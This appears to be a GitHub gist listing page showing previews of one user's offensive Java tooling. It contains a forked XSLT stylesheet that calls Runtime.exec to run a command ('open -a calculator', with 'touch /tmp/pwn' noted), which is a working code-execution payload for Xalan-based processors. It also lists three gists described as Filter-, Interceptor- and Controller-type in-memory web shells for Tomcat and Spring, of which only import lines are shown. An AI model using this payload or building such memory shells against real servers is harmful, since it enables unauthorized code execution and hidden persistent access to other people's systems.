m01e-40x
/ select.xslt
Created
January 8, 2025 09:44
— forked from thanatoskira/select.xslt
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> | |
| <xsl:template> | |
| <!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; --> | |
| <!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; --> | |
| <!-- #114 Utf8: open -a calculator --> | |
| <!-- #115 String: touch /tmp/pwn --> | |
| <xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/> | |
| <xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/> | |
| <!-- #132 Utf8: <init> --> | |
| <AAA select="<init>"/> |
m01e-40x
/ FilterMemShell.java
Created
May 17, 2023 15:13
A Filter-Type MemShell for Tomcat/SpringMVC_Tomcat/Springboot_Tomcat
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import org.apache.catalina.core.ApplicationContext; | |
| import org.apache.catalina.core.ApplicationContextFacade; | |
| import org.apache.catalina.core.StandardContext; | |
| import org.apache.tomcat.util.descriptor.web.FilterDef; | |
| import org.apache.tomcat.util.descriptor.web.FilterMap; | |
| import org.springframework.web.context.request.RequestContextHolder; | |
| import org.springframework.web.context.request.ServletRequestAttributes; | |
| import javax.servlet.*; | |
| import javax.servlet.http.HttpServletRequest; |
m01e-40x
/ SpringInterceptorMemShell.java
Last active
May 13, 2023 10:35
An Interceptor-Type MemShell for SpringMVC.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import org.springframework.web.context.WebApplicationContext; | |
| import org.springframework.web.context.request.RequestContextHolder; | |
| import org.springframework.web.servlet.HandlerInterceptor; | |
| import org.springframework.web.servlet.ModelAndView; | |
| import org.springframework.web.servlet.handler.AbstractHandlerMapping; | |
| import org.springframework.web.servlet.handler.MappedInterceptor; | |
| import org.springframework.web.servlet.handler.SimpleUrlHandlerMapping; | |
| import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping; | |
| import sun.java2d.pipe.SpanShapeRenderer; |
m01e-40x
/ SpringControllerMemShell.java
Created
April 8, 2022 15:07
Three Controller-Type MemShells for SpringMVC.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import org.springframework.web.context.WebApplicationContext; | |
| import org.springframework.web.context.request.RequestContextHolder; | |
| import org.springframework.web.context.request.ServletRequestAttributes; | |
| import org.springframework.web.servlet.mvc.condition.PatternsRequestCondition; | |
| import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition; | |
| import org.springframework.web.servlet.mvc.method.RequestMappingInfo; | |
| import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping; | |
| import javax.servlet.http.HttpServletRequest; | |
| import javax.servlet.http.HttpServletResponse; |